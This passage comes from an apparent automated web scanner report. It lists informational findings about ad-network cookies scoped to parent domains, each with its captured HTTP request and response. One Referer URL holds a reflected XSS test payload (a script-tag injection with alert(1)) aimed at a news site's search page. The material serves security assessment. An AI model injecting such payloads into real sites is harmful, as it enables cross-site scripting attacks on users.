Set-Cookie: anj=Kfw)lByDua)J710aPA0[:Pu_J9:BG^`l@=.O6Gp#_sLmr]hz%=_O[/t[y>fUSxS0CGsaUK#rr8E)Th5x@$E8w(gtkK?74:u#ZqW#kqC4rj!yxxuRSuPr'.3M+jk`Ehf(+Xu%LH<lL3_P-OT9c_(cUy1yAy%=`3rYunOd?h)8FQbl/2nq2-.O%5f#AL5e9eDuVn3i!!71kCd^Sv2suc5ghUxN^QPXb*W2kM/XS`nF_/v2`h4JKyyC81q5QRSl-_(%H21((wr>r%##Q>*IS>+19R'$K7DKdacc!KwMI4lk%78<(xzs%F^f?%vsX_a4bTwE3_!cKHPcv6^aPk:]+ZRqfWAdnwT(:>X>AFxEO5LU)NF:pKfN4+J-sVzkSftWr+m9LP01itX*3$2OYo4IRnj!)/HyN3C0FBv)d%TYL_[Wq[xFkr0u'C-b:Uufq7gT[7zyceD#`y!9^/@:Kf/@%JzVPS93$%TAfA'@r1nPs99WWB^ydwW]kV?_w#fWgKTQ.*-s1Rs#Gc(:vxV87q_bXUQaUy%G>G$-waWzeLjDEb*SEaWwv*jbDIMX(WG'7RS..jinLwKH^9`DN)tn*KtHiHDx0]'wh@u5tnA^9`rL/P$Mv83obr!B[KNoG=X@-'av%5I8Mk@PzWgM1nJl*VfNVhGccatm]20$^Q; path=/; expires=Wed, 14-Sep-2011 16:18:04 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 16 Jun 2011 16:18:04 GMT
Content-Length: 767

document.write('<scr'+'ipt type="text/javascript"src="http://ad.yieldmanager.com/imp?anmember=514&anprice=&Z=300x250&s=1457934&r=0&_salt=1248176818&u=http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F677%2F
...[SNIP]...

10.59. http://ib.adnxs.com/pxj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/pxj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=7226644042610287825; path=/; expires=Thu, 15-Sep-2011 10:11:57 GMT; domain=.adnxs.com; HttpOnly
anj=Kfu=8fG10Qcvjr/?0P(*AuB-u**g1:XICjmEi'-LIFbA<^r!$t'-BASc50#=dn`sCe^PfJ^fFmI/H2Bf9R1]`HmL!6C/oyX#+0S%K+8zY.N3s<P`gQ6XA)oueSz)AR!x2av1nm(v[IjK>GHVk?a+:o!*S.>gU'ZG; path=/; expires=Thu, 15-Sep-2011 10:11:57 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pxj?bidder=18&action=setuids(%27615022824147045895%27,%271CAESEA0pzwV4-SdN2wuhHcO4rdI%27);&redir=http%3A%2F%2Fib.adnxs.com%2Fgetuidu%3Fhttp%3A%2F%2Fa.rfihub.com%2Fcm%3Fapxuid%3D%24UID%26forward%3D HTTP/1.1
Host: ib.adnxs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=300&h=250&re=12387&pv=0&ra=3055140830.8481068485217647&rb=445&ca=&rc=&rd=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBGZxhZij7TY_LHIuY6QbcnsjECc-Bso8Cj9qbsyKb7MqEJwAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi01NjcyNTU3NDU3ODM0NDU0oAGz7MfrA7IBD3NlYXJjaC5jbmJjLmNvbboBCjMwMHgyNTBfYXPIAQnaAZ8BaHR0cDovL3NlYXJjaC5jbmJjLmNvbS9tYWluLmRvP3RhcmdldD1hbGwma2V5d29yZHM9eHNzM2EzNGIlM0Mvc2NyaXB0JTNFJTNDc2NyaXB0JTNFYWxlcnQoMSklM0Mvc2NyaXB0JTNFN2M1ZmE1NGJhMzZjY2E2OCZjYXRlZ29yaWVzPWV4Y2x1ZGUmc2VhcmNoYm94aW5wdXQ9eHNzmALyEcACBMgCze_PDqgDAfUDAgAARPUDIAAAAIAGocWLibeSzNGRAQ%2526num%253D1%2526sig%253DAGiWqtxiB7PhdyqkGidLM7p1mIFKK9-TJg%2526client%253Dca-pub-5672557457834454%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre3055140816039&pb=&pc=&pd=&pg=&ct=1308305514083&co=false&ep=TfsoZgAHJY8K2kwLmJIPXHR4qq0JxG4Pwd52ow&ri=4dfb286607258fada4cb9892f5c1&rs=4355cd3c1f5990ce.anonymous.google&ai=19789&rt=23252&pe=http%3A%2F%2Fsearch.cnbc.com%2Fmain.do%3Ftarget%3Dall%26keywords%3Dxss3a34b%253C%2Fscript%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E7c5fa54ba36cca68%26categories%3Dexclude%26searchboxinput%3Dxss&pf=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue
Cookie: icu=ChII3oQBEAoYAiACKAIwvvOg7wQQvvOg7wQYAQ..; uuid2=7226644042610287825; anj=Kfu=8fG7]PE:3F.0s]#%2L_'x%SEV/i#+eB!z6WAQA^22Q.V#j3PZn=3cjDbPg8nBCv?sAfW[W*3TK#t3T9T<e>W`_v1GCeq7?6qs:HN:*qpIl3]lOLO+)Zk4KLeMh22YaXG7659TTZ<`44!c'v3!k0u_K_%0=WEnbm@sE=d8Cdv<)%(_b6[fVF?vw_4B>tFYuWRi+^h)5]22>1Bwu>FG<jNgnXIv[qLe48KybCaBEcMm'X>7Yl=S!.'@HDkUO2

Response

10.60. http://ib.adnxs.com/seg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/seg

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=3420415245200633085; path=/; expires=Wed, 14-Sep-2011 12:52:48 GMT; domain=.adnxs.com; HttpOnly
anj=Kfw)l=m<8a)J710+6hRTYMDd?(2ud2@^hR2%iF%elQFU[:Sk64=OMrX1+dtO[)viBAO'cccdwt%OuIjy)YAms#Hw2pM5Z1P:4r(SRh]_5bFD'euL1UeWXp/(c4c3]4V'tBHN?:@ka7Byrx$S8Rg_>f^S(_WiT^vysIKy0QEbchsL!u``]ZQ.9N0gkuwuOp-:vX<`FB/dbrg=Z65%1dcLQ_H-`t4%k@s`ln$HIW55B+yH2wsznEucp^3U?0tg#^X)3a++.[Q@72>=luA4H[7UPS93kAFPfeiKHzuS/+e<xF>C/p/b<Y0DZsuSSIjrNOs]cdLSX=s5>6^aP-)]*X9?Xd8)tuS5zT882-bU_h)7C.Ek$n-2HChXV4S?6lR8EA)b.k78Of_I2TF)+%VTlY:gVS!t@dhLH^697[MccN!f7L8KT]+.HX?GH_RNn-Nm^X>aqAKi*6Gl3t%rHI)z1L.T%XlU9TMTfop_Y`N(?6.5sVhi@EX[eMN<>7@W?$UtM)uTsMq?Q+18cayZmmA[pc'GvCW>5?idaKbW*g7n0y]?CA_>F)rQi*-b^>NY2)ZL9#BXc^/)p-N0y^8wdHmrnaR`r<::Ql_y6I[8(Lx$Fr$vrc^A/5v1]Y:>@H=x7+esipbOwXx6O@<TjfJce:A!@qhx89*_e; path=/; expires=Wed, 14-Sep-2011 12:52:48 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /seg?add=116843&t=2 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh44.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChEI_3YQChgBIAEoATDOzeXvBBDOzeXvBBgA; anj=Kfw)k=m<8a)J710KuqQv<wO[?.Z_6mQq(g8AdPznm4mV81(GwAdiq`tRFu9!<9WzID'dGuNsFx#:D$8):ECJr9*<7Y2B>h7#K-)26=S$JLUK>tc`oa^hD)BGY/HDIhRDv9`a)c=8Ns>'sTtY@rKf[42mEhF[x1(Z_WwCH=Q+CR#M/Pcv%qJCor_')4ZdnJAHJC!a[2QmvVUX0Y_AKQ6]5HO+=VJZ`Cn[.2-IAX7bw@(a6>NjWme_:Ez/L:lx+(-pIN(s?u*Kp^>>(5'p4ofX#f0tYcv/p_jyip?!*]Dhn<#nKj>zFXcZ3]cqTB$x8^Vcd3Q-9>LakKGuGRw!Wji-MU9XpC`s@ic92+2>.GL=U`b%(%gUKPx$]'`FGhEuD(sI?!QUr=v^-Mw`]j'Z.GUWgN$LX9J+!8fE#32>o8R`ORKPT@'^f3FPpl/vc(/uBHutpQhMdK68AZiL))1=C1hP-UYc7$L8HQ4R_fODEItt9)Se99+Gb46bp3t#1x-akYef0CGm/MocK_-@Tp5y1_eYlocCWH/?W=eW+d^NMAs)%MKv$X4.^owlwj<.lUF)12uChi8B:r08nN+5]N0mcIu/@qO$hlOz@IaFRGpZ*%hA-[It2owGgYBR3JoC5rww'EPwpN%zx; __ar_v4=%7CO5SUSHFLMFHUBPFB64PGTV%3A20110616%3A1%7C3FSLMUQHHZF3ZGSHGFBTCR%3A20110616%3A1%7CWRSB44J6LBBYHJ46YBYSXU%3A20110616%3A1%7COZVXN65U6VG3BGSO7THUYQ%3A20110616%3A1; sess=1; uuid2=3420415245200633085

Response

10.61. http://ib.adnxs.com/setuid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/setuid

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=3420415245200633085; path=/; expires=Wed, 14-Sep-2011 11:29:00 GMT; domain=.adnxs.com; HttpOnly
anj=Kfw)k=m<8a)J710L3Gy9TWV.oNlf4H*NXLL_iBz_b.''N>jOm^P@9?m+C_GP(C^0z!]!VH)NxA/1G>[X3JDyN/(4'FtLiLzO08/x-Xy--K3giKrx#htm:@!z=k3t*VxD=HVfx<3]d:Mm0gd*)^QJVBmmAPVIoeaHn9/y+jMyoL$r%pQH480)9tmrkuwe'f8-AVAwR:G@_D<wD@aNfH^HwdP$HZl/=8U0dM06Yo`q@]30N(Pdlk'mOg0cidQW#16v7+NaIdC1ostf($ofU?4g--[L*PM:dgS#yUr$zdIv#+:o!X)*^qPZcc7yxYju:I90eb06Sp:f[.VrIS8*Zsx_tvUS%x<(jSu2bgk6R>k>BqK3@h3sj[hZP6WP[uuLOCdyn#gg?-qX_@tlF/w!O:oz2'NAvlLvsX)LypF]tZO)aB=mq6Z-j_T4$zhJt%ro)gi_Sg6XtcKTXU`SKrWRVA0`g'](J`SbYuK:dvE7A5ecNzaSf9NpM$N<G6...Z_7FB7qec(d2>^_`!L!74zi^br#T(KiuJi'R4B4FJ%jOOWXj`Bt+.'+HfA/nIuG*3Lifj6WCPzfdMO3bTxAcSvdW/>s#J-EXT.$oJMENiKT(F-P!13wM05eSJ5<w!LC/ZS<hF98Ul#gY; path=/; expires=Wed, 14-Sep-2011 11:29:00 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /setuid?entity=34&code=WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://login.dotomi.com/ucm/UCMController?dtm_com=28&dtm_cmagic=359365&dtm_fid=101&dtm_format=5&cli_promo_id=1&dtmc_ver=2&dtm_cid=2339&dtmc_url=http%3A//www.homedepot.com/webapp/wcs/stores/servlet/Navigation%3FstoreId%3D10051%26categoryID%3D556456%26langId%3D-1%26catalogId%3D10053%26selectedCatgry%3DSEARCH%2520ALL%26navFlow%3D3%26searchRedirect%3Dlawn%2520mower%26Nu%3DP_PARENT_ID%26locStoreNum%3D4501&dtmc_category=Outdoors%3EOutdoor%20Power%20Equipment%3EWalk%20Behind%20Mowers&dtmc_prop_one=Outdoors%3EOutdoor%20Power%20Equipment%3EWalk%20Behind%20Mowers&dtmc_prop_two=e04ee989-dab2-408d-ab5e-0f5dd59957f0&dtmc_prop_four=lawn%20mower&dtmc_page_type=Subcategory&
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChEI_3YQChgBIAEoATDOzeXvBBDOzeXvBBgA; anj=Kfw)k=m<8a)J710KuqQv<wO[?.Z_6mQq(g8AdPznm4mV81(GwAdiq`tRFu9!<9WzID'dGuNsFx#:D$8):ECJr9*<7Y2B>h7#K-)26=S$JLUK>tc`oa^hD)BGY/HDIhRDv9`a)c=8Ns>'sTtY@rKf[42mEhF[x1(Z_WwCH=Q+CR#M/Pcv%qJCor_')4ZdnJAHJC!a[2QmvVUX0Y_AKQ6]5HO+=VJZ`Cn[.2-IAX7bw@(a6>NjWme_:Ez/L:lx+(-pIN(s?u*Kp^>>(5'p4ofX#f0tYcv/p_jyip?!*]Dhn<#nKj>zFXcZ3]cqTB$x8^Vcd3Q-9>LakKGuGRw!Wji-MU9XpC`s@ic92+2>.GL=U`b%(%gUKPx$]'`FGhEuD(sI?!QUr=v^-Mw`]j'Z.GUWgN$LX9J+!8fE#32>o8R`ORKPT@'^f3FPpl/vc(/uBHutpQhMdK68AZiL))1=C1hP-UYc7$L8HQ4R_fODEItt9)Se99+Gb46bp3t#1x-akYef0CGm/MocK_-@Tp5y1_eYlocCWH/?W=eW+d^NMAs)%MKv$X4.^owlwj<.lUF)12uChi8B:r08nN+5]N0mcIu/@qO$hlOz@IaFRGpZ*%hA-[It2owGgYBR3JoC5rww'EPwpN%zx; sess=1; uuid2=3420415245200633085; __ar_v4=%7CO5SUSHFLMFHUBPFB64PGTV%3A20110616%3A1%7C3FSLMUQHHZF3ZGSHGFBTCR%3A20110616%3A1%7CWRSB44J6LBBYHJ46YBYSXU%3A20110616%3A1%7COZVXN65U6VG3BGSO7THUYQ%3A20110616%3A1

Response

10.62. http://idcs.interclick.com/Segment.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://idcs.interclick.com
Path:	/Segment.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

sgm=9622=734271&9000=734271&570=734271&410=734271&846=734271&7472=734279&6790=734276&7434=734280&7594=734283&428=734285&11062=734293&11060=734293&8170=734303; domain=.interclick.com; expires=Wed, 16-Jun-2021 11:32:15 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Segment.aspx?sid=2ade7dc4-7b38-4be6-a76b-f20c7fbbe154 HTTP/1.1
Host: idcs.interclick.com
Proxy-Connection: keep-alive
Referer: http://login.dotomi.com/ucm/UCMController?dtm_com=28&dtm_cmagic=359365&dtm_fid=101&dtm_format=5&cli_promo_id=1&dtmc_ver=2&dtm_cid=2339&dtmc_url=http%3A//www.homedepot.com/webapp/wcs/stores/servlet/Navigation%3FstoreId%3D10051%26categoryID%3D556456%26langId%3D-1%26catalogId%3D10053%26selectedCatgry%3DSEARCH%2520ALL%26navFlow%3D3%26searchRedirect%3Dlawn%2520mower%26Nu%3DP_PARENT_ID%26locStoreNum%3D4501&dtmc_category=Outdoors%3EOutdoor%20Power%20Equipment%3EWalk%20Behind%20Mowers&dtmc_prop_one=Outdoors%3EOutdoor%20Power%20Equipment%3EWalk%20Behind%20Mowers&dtmc_prop_two=e04ee989-dab2-408d-ab5e-0f5dd59957f0&dtmc_prop_four=lawn%20mower&dtmc_page_type=Subcategory&
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=8fb5e3ac-83a3-4cca-8da7-7f2e4e96648c; tpd=e20=1308573230578&e90=1306586030476&e50=1308573231659&e100=1306586032110; sgm=9622=734271&9000=734271&570=734271&410=734271&846=734271&7472=734279&6790=734276&7434=734280&7594=734283&428=734285&11062=734293&11060=734293

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 70
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: sgm=9622=734271&9000=734271&570=734271&410=734271&846=734271&7472=734279&6790=734276&7434=734280&7594=734283&428=734285&11062=734293&11060=734293&8170=734303; domain=.interclick.com; expires=Wed, 16-Jun-2021 11:32:15 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Thu, 16 Jun 2011 11:32:15 GMT

GIF89a...................!..NETSCAPE2.0.....!.......,................;

10.63. http://image2.pubmatic.com/AdServer/Pug previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://image2.pubmatic.com
Path:	/AdServer/Pug

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PUBRETARGET=571_1400116791.82_1400116792.1252_1400118837.78_1400354702.1985_1309635446.1039_1308520111.461_1401136140.76_1310782572; domain=pubmatic.com; expires=Mon, 26-May-2014 20:29:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AdServer/Pug?vcode=bz0xJnR5cGU9MiZjb2RlPTM3NSZ0bD0xNTc2ODAw HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://dis.ny.us.criteo.com/dis/dis.aspx?pu=1108&c=197&cb=46e975b383
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KADUSERCOOKIE=AFFBE250-9A12-4532-ADE8-267A400F31BA; KRTBCOOKIE_57=476-uid:3420415245200633085; KRTBCOOKIE_58=1344-AG-00000001389358554; KRTBCOOKIE_22=488-pcv:1|uid:4325897289836481830; KRTBCOOKIE_133=1873-1voofy6a0tk1w; KRTBCOOKIE_27=1216-uid:4dd07bc8-e97b-118c-3dec-7b8c5c306530; KRTBCOOKIE_32=1386-WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP; PUBMDCID=2; KTPCACOOKIE=YES; KRTBCOOKIE_80=1336-09035c0c-59c0-487e-ac6a-85a606e2b1c1.11265.45708.32515.29191.13450.32180.22924.41869.23954.36845.45714.49027.59481.48153.18842.30364.48669.43937.48674.2083.32164.48070.47281.59306.199.32172.44336.1073.40626.44340.50398.45641.22328.49076.32190.32165.45643.; KRTBCOOKIE_16=226-uid:3460050161923843111; PUBRETARGET=571_1400116791.82_1400116792.1252_1400118837.78_1400354702.1985_1309635446.1039_1308520111.461_1401136140.375_1309953289.76_1310782572

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 13:08:11 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: PUBRETARGET=571_1400116791.82_1400116792.1252_1400118837.78_1400354702.1985_1309635446.1039_1308520111.461_1401136140.76_1310782572; domain=pubmatic.com; expires=Mon, 26-May-2014 20:29:00 GMT; path=/
Content-Length: 42
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D.;

10.64. http://imp.constantcontact.com/imp/cmp.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imp.constantcontact.com
Path:	/imp/cmp.jsp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

impcc="IMP_14302119028291151=21766357|IMP_14302119028289010=21804157|IMP_14302119028289010=21804157|IMP_14302119028205615=21803130|IMP_14302119028205613=21799456|"; expires=Wed, 14-Sep-2011 18:37:48 GMT; path=/; domain=.constantcontact.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /imp/cmp.jsp?impcc=IMP_14302119028289010&o=http://img.constantcontact.com/lp/images/standard/spacer.gif HTTP/1.1
Host: imp.constantcontact.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308249463404&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cclp_partner="prt_01_ts=21765467|prt_01=partner.name::ROVING|"; cclp_cc="cc_01=cc::CLK_14302119028162790|cc_01_ts=21765467|"; cclp_content="lp_uid=20110520_17:47:29.427_D08BF0DD3997CF44662F1C34AFFAC1EC.worker_landingPages|"; cclp_referral="partner=ROVING|cc=CLK_14302119028162790|pn=ROVING|sitereferrer=http://www.constantcontact.com/index.jsp|partner.name=ROVING|"; mbox=check#true#1305928126|session#1305928065281-657231#1305929926|PC#1305928065281-657231.17#1313704077; __utma=152702054.1555155570.1305928095.1305928095.1305928095.1; __utmz=152702054.1305928095.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26EB70CF851D05A5-4000012DA001F43D[CE]; CPl200502=888%7C888%7C888%7CNULL%7Cundefined%7Cundefined%7C%252Findex%252Ejsp; impcc="IMP_14302119028291151=21766357|IMP_14302119028205615=21803130|IMP_14302119028205613=21799456|IMP_%3Cplacementid/%3E=21776370|IMP_14302119028337130=21775459|"

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 07 Sep 2007 15:01:23 GMT
ETag: "b95c5-2b-4398ce98736c0"
Accept-Ranges: bytes
Content-Length: 43
X-Powered-By:
Content-Type: image/gif
Cookie: "IMP_14302119028250220=21612959|IMP_14302119028289011=21612994|"
IMPCC_COOKIE_NEW:
IMPCC_COOKIE:
PREFIX_IMPCC: IMP_
IMPCC: IMP_14302119028289011
Expires: Thu, 16 Jun 2011 18:37:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 16 Jun 2011 18:37:48 GMT
Connection: close
Set-Cookie: impcc="IMP_14302119028291151=21766357|IMP_14302119028289010=21804157|IMP_14302119028289010=21804157|IMP_14302119028205615=21803130|IMP_14302119028205613=21799456|"; expires=Wed, 14-Sep-2011 18:37:48 GMT; path=/; domain=.constantcontact.com
Cookie: "IMP_14302119028291151=21766357|IMP_14302119028289010=21804157|IMP_14302119028289010=21804157|IMP_14302119028205615=21803130|IMP_14302119028205613=21799456|"
IMPCC_COOKIE_NEW: IMP_14302119028289010=21804157|IMP_14302119028205615=21803130|IMP_14302119028205613=21799456|
IMPCC_COOKIE: IMP_14302119028289010=21804157|IMP_14302119028205615=21803130|IMP_14302119028205613=21799456|
PREFIX_IMPCC: IMP_
IMPCC: IMP_14302119028289010

GIF89a.............!.......,...........D..;

10.65. http://js.revsci.net/common/pcx.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://js.revsci.net
Path:	/common/pcx.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs__1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rsB4rOfq5QuYXLnKYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnU5yOkHFIHZYDJEHWaOW+4wYaiyyY715ckFoFlDXAQEgoeqnG3CUq1eF28RHMrcV0qtaohUjTO3yPCIMPaYnGbhmVSc5VfYij9OMIYKQd6IEV/U7eaOKVrIVUuoozmIGg2QYHf7CkyKF/JXks5veheEvi341VI6cB5NWitPCMF79O9TY2r/1wMDRcxCr0dOcOdWfBETSZ5j8rCSuegYPLLWDcPlCLSDoScLh4z5LS4irvuWTxzQqieFTIm02czO7dpwSpf2Y03EuikRKLvIQ54HXIZiXFRPHQ+5fNwzySL2dIvUlQvXsMV1c7MlCYCi+fiGdsiNsHNxHVjX8mas8pgfv2ttYG+R5Eg+ThssuvXjIsc1pVES5xcei65xpvTqTJaydwuZ9kxQ5keTeT1tnFtzpwFdZ8U8GECM54dZrQOemERZaGGIdE0y1HTZTwX48tMHCOtiJHmt3yea4FtR/slYBWdCdCAo1Nm6994UlxsgpWDUNgaHw5bycN5/By3TFwX+jrP8dD+oaWZJ8AJL0UK7e2pDV0vceBeayTLoc9lBQ+P3ZqQwLxTRawPc5ca2Q95/KGyQGdIN4xMvc2lY7fC7DMX+HCQ==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 11:24:22 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /common/pcx.js?tmpl=cm&csid=G07608&ko=2011_6_16__0 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://commerce.wsj.com/auth/forgotpass?mod=WSJ_formfactor
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1adad3&9&10133,10640,10654,10670,10448,10450,10451,10452,10454&4df43073&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; 